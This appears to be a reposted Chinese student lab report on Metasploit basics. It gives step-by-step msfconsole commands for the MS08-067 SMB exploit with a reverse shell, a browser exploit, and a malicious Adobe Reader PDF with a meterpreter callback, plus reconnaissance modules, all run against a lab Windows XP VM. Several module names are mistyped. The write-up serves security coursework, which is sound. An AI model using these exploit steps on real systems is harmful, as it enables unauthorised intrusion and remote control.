20155328 网络攻防 实验五:MSF基础应用

最新推荐文章于 2022-10-22 12:52:23 发布
最新推荐文章于 2022-10-22 12:52:23 发布
阅读量236 收藏 2
点赞数
文章标签: 操作系统 数据库
原文链接:http://www.cnblogs.com/zyqzyq/p/8983123.html
版权

20155328 网络攻防 实验五:MSF基础应用

实践内容及过程记录

一、Windows服务渗透攻击————ms08_067

攻击机:kali

靶机:WindowsXP(英文版)

第一步,分别查看攻击机和靶机的IP。
1065527-20180502230909722-649407773.png

1065527-20180502230927626-978823975.png

在kali终端中,输入msfconsole进入msf控制台,依次输入以下指令:

use exploit/windows/smb/ms08_067_netapiuse exploit/windows/smb/ms08_067_netapi

show payloads

set payload generic/shell_reverse_tcp

set LHOST 192.168.127.138

set LPORT 5328

set RHOST 192.168.127.139

set target 0

exploit

1065527-20180502230949110-1142809993.png

攻击成功,可以看到已经获取了靶机的系统信息:

1065527-20180502231004235-1790327505.png

二、浏览器渗透攻击————ms11_103

在kali终端输入msfconsole打开msf控制台,输入以下参数:

1065527-20180502231114214-210756991.png

被攻击的主机可以看到网页无法正常打开:

1065527-20180502231123548-463473145.png

回到kali,输入以下指令:

sessions
sessions -i n//n为显示的最大进程号

可以看到攻击成功了。
1065527-20180502231133081-835687598.png

三、针对Adobe Reader的渗透攻击

在kali中进入msf控制台,输入以下指令:

use windows/fileformat/adobe)cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
set FILENAME 20155328.pdf
exploit

生成了PDF:
1065527-20180502231148309-11463546.png

将生成的PDF拷贝到靶机上。

kali中输入back,进入监听模块,输入以下命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
exploit

1065527-20180502231157923-1075108563.png

然后在靶机上打开PDF:

1065527-20180502231205063-203878955.png

攻击机显示攻击成功:

1065527-20180502231214131-1696861535.png

四、应用Aux辅助模块

1.browser_info

在kali终端中输入show auxiliary,查看aux中都有哪些模块,最后选中gather/browser_info。

进入到msf控制台后,依次输入以下命令:

use auxiliary/gather_browser_info

set SRVHOST 192.168.127.138 //kali的IP

set SRVPORT 5328

exploit

可以看到生成了URL,且Server Start。
1065527-20180502231230226-476479300.png

复制链接,在靶机(WindowsXP)中进行访问:

1065527-20180502231238241-1156553743.png

回到kali,可以看到已经获取了靶机访问该url的浏览器信息。

1065527-20180502231246101-1126844476.png

2.arp_sweep

先在kali终端中输入以下命令,手动创建一个msf所需的数据库:

service postgresql start
msfdb start

再输入msfconsole开启msf,输入命令use auxiliary/scanner/discovery/arp_sweep进入模块,设置参数:(RHOSTS填写kali所在的网段)
1065527-20180502231305433-533457081.png

设定好了以后输入run,可以看到除了自己主机IP外,还有三个其他IP:

1065527-20180502231313294-45097686.png

在msf中输入命令db_nmap -O 192.168.127.139(靶机IP),可以看到开启的端口号即靶机的目标操作系统。
1065527-20180502231320489-1435005936.png

基础问题回答

用自己的话解释什么是exploit,payload,encode。

exploit:利用漏洞或一切可利用的东西进行获取用户权限、篡改文件信息等操作。

payload:在靶机上执行的一段代码,可以反弹连接。

encode:对特征码进行编码,改变特征码。

实践总结与体会

这次实验主要是做的小模块比较多,感觉还。。挺厉害的。。再接再厉吧。

转载于:https://www.cnblogs.com/zyqzyq/p/8983123.html

weixin_33948416
关注
20202414 2022-2023-2 《网络与系统攻防技术》实验实验报告
h118189的博客
05-16 1166
本次实验学习目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。我进行了以下实践,对msf进行攻击有了更深的理解:1.1 一个主动攻击实践,使用使用漏洞为永恒之蓝(MS17_010);1.2 一个针对浏览器的攻击,使用漏洞为极光漏洞(MS10_002);1.3 一个针对客户端的攻击,实施了针对Adobe的漏洞的攻击;1.4 成功应用任何一个辅助模块。
网络靶场攻防综合实验
weixin_46605806的博客
12-20 7006
目录一,靶场环境搭建1.1,网络拓扑结构图1.2,搭建简易的网络攻防实验靶场环境,包括:1.3,网络靶场攻击渗透测试,包括:1.4,网络靶场攻击检测二,靶场的搭建与攻击渗透测试2.1,Honeyd2.1.1,honeyd概述2.1.2,honeyd所依赖的函数库2.1.3,搭建honeyd2.1.4,编写honeyd的配置文件2.1.5,启动honeyd2.1.6,检查honeyd搭建情况2.2,具有“永恒之黑”CVE-2020-0796漏洞的虚拟主机2.2.1,漏洞概述2.2.2,复现环境2.2.3,漏洞
[网络安全学习篇66]:Metasploit(MSF)
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-13 2835
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点...
20169214 2016-2017-2 《网络攻防实践》实验——免杀技术
weixin_30617561的博客
06-04 160
20169214 2016-2017-2 《网络攻防实践》实验——免杀技术 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测:杀软通过对已存在的流行代码特征的提取与比对检测到具有该特征码的程序就当作检测到了恶意代码。 基于行为的检测:杀软通过检测程序是否有更改注册表行为、是否有设置自启动、是否有修改权限等等 (2)免杀是做什么? 就是通过针对杀毒软件查杀恶意代码...
20169212 2016-2017-2 《网络攻防实践》实验
weixin_30335353的博客
04-30 134
20169212 2016-2017-2 《网络攻防实践》实验二 Nmap实践 Nmap简介 NMap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用...
网络攻防实验MSF基础应用
weixin_34232744的博客
04-12 187
IE浏览器渗透攻击——MS11050安全漏洞 实验准备 1.两台虚拟机,其中一台为kali,一台为Windows Xp Professional(两台虚拟机可以相互间ping通)。 2.亚军同学的指导书 实验步骤 1、在kali终端中开启msfconsole。 2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。 3、输...
kali linux之msf信息收集
weixin_30763397的博客
03-07 221
nmap扫描 Auxiliary 扫描模块 目前有557个扫描方式 use auxiliary/scanner/smb/smb_version(smb版本扫描) use auxiliary/scanner/smb/pipe_auditor(扫描命名管道,判断smb服务类型,帐号,密码) use auxiliary/scanner/smb/pipe...
关于网络攻防的一些案例
最新发布
03-26
本文主要围绕网络攻防中的扫描技术展开,包括常见的扫描工具和技术、靶机及蜜罐的应用等方面进行深入探讨。 #### 扫描技术概述 扫描技术是网络安全领域的重要组成部分,主要用于发现网络中潜在的安全威胁,帮助安全...
网络攻防实战研究 漏洞利用与提权读书笔记二
一枚努力的蛋蛋
08-24 3265
网络攻防实战研究 漏洞利用与提权读书笔记二第2章 Windows漏洞利用与提权2.1 Windows提权基础2.1.1 Windows提权信息的收集2.1.2 Windows提权准备2.1.3 使用MSF平台搜索可利用的POC2.1.4 实施提权2.1.5 停用安全狗2.2 提权辅助工具Windows-Exploit-Suggester2.2.1 Windows-Exploit-Suggester...
MSF模拟渗透测试攻击window实例
lza20001103的博客
04-06 4212
一次MSF模拟渗透测试攻击window实例
MSF手机渗透实验
weixin_63204687的博客
10-22 4433
可真刑,太可拷了
MSF后渗透攻击
weixin_43749601的博客
03-06 1767
进程迁移 刚获得shell时,该shell是极其脆弱和容易受到攻击的。所以第一步就是要移动这个shell,把它和目标机中的一个稳定的进程绑定在一块。 1.ps命令获取目标机正在运行的进程。 2.getpid获得shell的进程号(PID) 3.通过进程号得知该shell的进程名。 4.输入migrate + 被绑定进程的PID 5.再次输出getpid,发现进程号已经变成需要迁移的进程号,进程迁移成功 系统命令 shell连接稳定之后,开始收集系统信息 1.sysinfo命令查看目标机的系统信息 2.rou
kali攻击命令大全_利用msf攻击win10
热门推荐
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
一个简单的msf远程渗透实验
JYLCG的博客
05-08 1160
原文链接 网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明白原理,懂得如何防范,再三强调!!! 使用此教程用在不正当地方造成的后果与本人无关!...
MS11-050安全漏洞
weixin_30470857的博客
04-09 509
IE浏览器渗透攻击——MS11050安全漏洞 实验前准备 1、两台虚拟机,其中一台为kali,一台为windows xp sp3(包含IE7)。 2、设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通(关闭靶机防火墙)。 实验步骤: 1、在kali终端中开启msfconsole。 2、输入命令use windows/browser/ms11_050_mshtml_cobjectelem...
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2598
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
windows漏洞利用
zhaji001
09-13 2885
编译运行 源代码: #include <stdio.h> greeting(char *temp1, char *temp2){ char name[400]; strcpy(name, temp2); printf("Hello %s %s\n", temp1, temp2); } main(int argc, char *argv[]){ greeting(ar...
MSF基础与团队模型详解:原则、应用与CMMI比较
MSF(Microsoft Solution Framework)是一种由微软提出的项目管理和软件开发框架,旨在提供一套结构化的方法来指导项目的成功实施。其基本原则与团队模型是MSF的核心组成部分,涵盖了项目管理的关键要素。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值